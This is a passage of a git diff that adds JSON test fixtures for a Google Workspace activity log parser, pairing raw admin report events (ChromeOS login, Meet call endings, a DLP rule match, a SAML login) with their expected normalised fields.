"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "event": { + "action": "CHROME_OS_LOGIN_EVENT", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_KIOSK_SESSION_LOGIN", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-08T13:20:40Z", + "cloud": { + "account": { + "id": "C01x7c000" + } + }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097973333333333" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_end_call.json b/Google Cloud/google-report/tests/test_end_call.json new file mode 100644 index 000000000..21a51a926 --- /dev/null +++ b/Google Cloud/google-report/tests/test_end_call.json @@ -0,0 +1,59 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T12:07:37.366000Z", + "client": { + "geo": { + "country_iso_code": "FR", + "region_name": "Paris" + } + }, + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "ABCDEFGHIJ" + } + } + }, + "network": { + "application": "meet", + "transport": "udp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_end_call_no_ip.json b/Google Cloud/google-report/tests/test_end_call_no_ip.json new file mode 100644 index 000000000..de33d47c4 --- /dev/null +++ b/Google Cloud/google-report/tests/test_end_call_no_ip.json @@ -0,0 +1,44 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T11:32:12.301000Z", + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "BUSOHGFTVB" + } + } + }, + "network": { + "application": "meet", + "transport": "tcp" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_meet_sample1.json b/Google Cloud/google-report/tests/test_meet_sample1.json index 406a0943c..fd7b1fa66 100644 --- a/Google Cloud/google-report/tests/test_meet_sample1.json +++ b/Google Cloud/google-report/tests/test_meet_sample1.json @@ -41,13 +41,20 @@ "transport": "udp" }, "related": { + "ip": [ + "5555:333:333:5555:5555:5555:5555:5555" + ], "user": [ "jone.doe" ] }, + "source": { + "address": "5555:333:333:5555:5555:5555:5555:5555", + "ip": "5555:333:333:5555:5555:5555:5555:5555" + }, "user": { "domain": "test.com", - "email": "jone.doe@test.com", + "email": "joe.done@test.com", "id": "1098488062555", "name": "jone.doe" } diff --git a/Google Cloud/google-report/tests/test_rules_sample_1.json b/Google Cloud/google-report/tests/test_rules_sample_1.json new file mode 100644 index 000000000..3f7ef889b --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_1.json @@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "action_complete", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "113328670183616666666", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_rules_sample_2.json b/Google Cloud/google-report/tests/test_rules_sample_2.json new file mode 100644 index 000000000..f7a1e9bf9 --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_2.json @@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "content_matched", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "11332867018361686666666", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json new file mode 100644 index 000000000..8a9785816 --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success.json @@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 